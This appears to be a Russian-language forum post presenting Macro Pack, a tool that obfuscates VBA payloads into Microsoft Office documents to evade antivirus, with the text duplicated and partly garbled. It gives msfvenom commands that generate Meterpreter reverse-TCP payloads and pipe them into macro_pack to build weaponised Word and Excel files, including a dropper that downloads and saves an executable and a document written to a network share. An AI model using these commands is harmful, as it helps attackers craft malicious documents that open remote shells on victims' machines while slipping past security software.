Приветствую, сегодня хочу представить аудитории инструмент, целью которого является обфускация вашего, или где-то позаимствованного кода. Итогом будет, как обещают авторы, снижение агрессии на него АВ-программ. Я полагаю, не нужно обьяснять, что обфусцированные примеры не стоит постить на любимый многими «хакерами» ресурс.
Вот собственно, Macro Pack:
Macro Pack - это инструмент, используемый для автоматизации обфускации и генерации документов MS Office для проведения тестирования на проникновение. Macro Pack – позволяет обойти алгоритмы выявления вредоносного кода антивирусными программами и упростит преобразование vba – полезной нагрузки в окончательный документ Office.
Более подробная информация находится тут:
> sevagas/macro_pack
Особенности:
Примечание:
Установка:
Примечание. Для Windows вам необходимо загрузить вручную pywin32
>
Справка:
Использование:
Обфускация полезной нагрузки в формате vba, сгенерированной msfvenom, и помещение результата в новый файл vba.
Обфускация Empire stager vba файла и создание документа MS Word:
Создание файла MS Excel, содержащего обфускационную капельницу (загрузите файл loadload.exe и храните его как drop.exe)
Создание документа Word 97, содержащего обфускацию полезной нагрузки обратного подключения VBA в общей папке:
Рассмотрим это на небольшом примере:
Обфусцируем VBA от Metasploit:
Результат будет таким:
Полагаю, инструмент окажется полезным и займет место в наборе начинающего/опытного пентестера.
Спасибо за внимание
Вот собственно, Macro Pack:
Macro Pack - это инструмент, используемый для автоматизации обфускации и генерации документов MS Office для проведения тестирования на проникновение. Macro Pack – позволяет обойти алгоритмы выявления вредоносного кода антивирусными программами и упростит преобразование vba – полезной нагрузки в окончательный документ Office.
Более подробная информация находится тут:
> sevagas/macro_pack
Особенности:
- Отсутствует необходимость конфигурирования
- Необходимые действия могут быть выполнены одной строкой кода
- Создание Word, Excel и PowerPoint документов
Примечание:
Обфускация:Для Windows необходим подлинный пакет MS Office для автоматической генерации документов Office или троянских функций
- Переименование функций
- Переименование переменных
- Удаление пробелов
- Удаление комментариев
- Кодирующие строки
Установка:
Код:
git clone https://github.com/sevagas/macro_pack
cd macro_pack
Код:
pip3 install -r requirements.txt
Примечание. Для Windows вам необходимо загрузить вручную pywin32
>
Ссылка скрыта от гостей
Справка:
Код:
macro_pack.py --help
Использование:
Обфускация полезной нагрузки в формате vba, сгенерированной msfvenom, и помещение результата в новый файл vba.
Код:
msfvenom -p windows / meterpreter / reverse_tcp LHOST = 192.168.0.5 -f vba | macro_pack.py -o -v meterobf.vba
Код:
macro_pack.py -f empire.vba -o -W myDoc.docm
Код:
echo "https: //myurl.url/payload.exe" "drop.exe" | macro_pack.py -o -t DROPPER -x "drop.xlsm"
Код:
msfvenom.bat -p windows / meterpreter / reverse_tcp LHOST = 192.168.0.5 -f vba | macro_pack.exe -o -w \\ REMOTE-PC \ Share \ meter.doc
Обфусцируем VBA от Metasploit:
Код:
msfvenom -p windows / meterpreter / reverse_tcp LHOST = 192.168.0.5 -f vba –o 123.txt
Код:
msfvenom -p windows / meterpreter / reverse_tcp LHOST = 192.168.0.5 -f vba | macro_pack.py -o -v 1234.vba
Результат будет таким:
Полагаю, инструмент окажется полезным и займет место в наборе начинающего/опытного пентестера.
Спасибо за внимание